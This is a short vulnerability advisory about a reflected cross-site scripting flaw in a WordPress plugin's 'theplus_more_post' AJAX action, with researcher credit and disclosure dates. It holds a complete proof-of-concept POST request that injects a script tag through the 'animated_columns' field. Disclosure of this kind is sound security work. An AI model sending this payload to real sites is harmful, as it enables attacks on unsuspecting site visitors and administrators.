The theplus_more_post AJAX action of the plugin did not properly sanitise some of its fields, leading to a reflected Cross-Site Scripting (exploitable on both unauthenticated and authenticated users)
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 174 Connection: close action=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(%2fXSS%2f)%3c%2fscript%3e
Nicolas VERDIER from TEHTRIS
Nicolas VERDIER from TEHTRIS
Yes
2021-05-31 (about 2 years ago)
2021-05-31 (about 2 years ago)
2021-06-01 (about 2 years ago)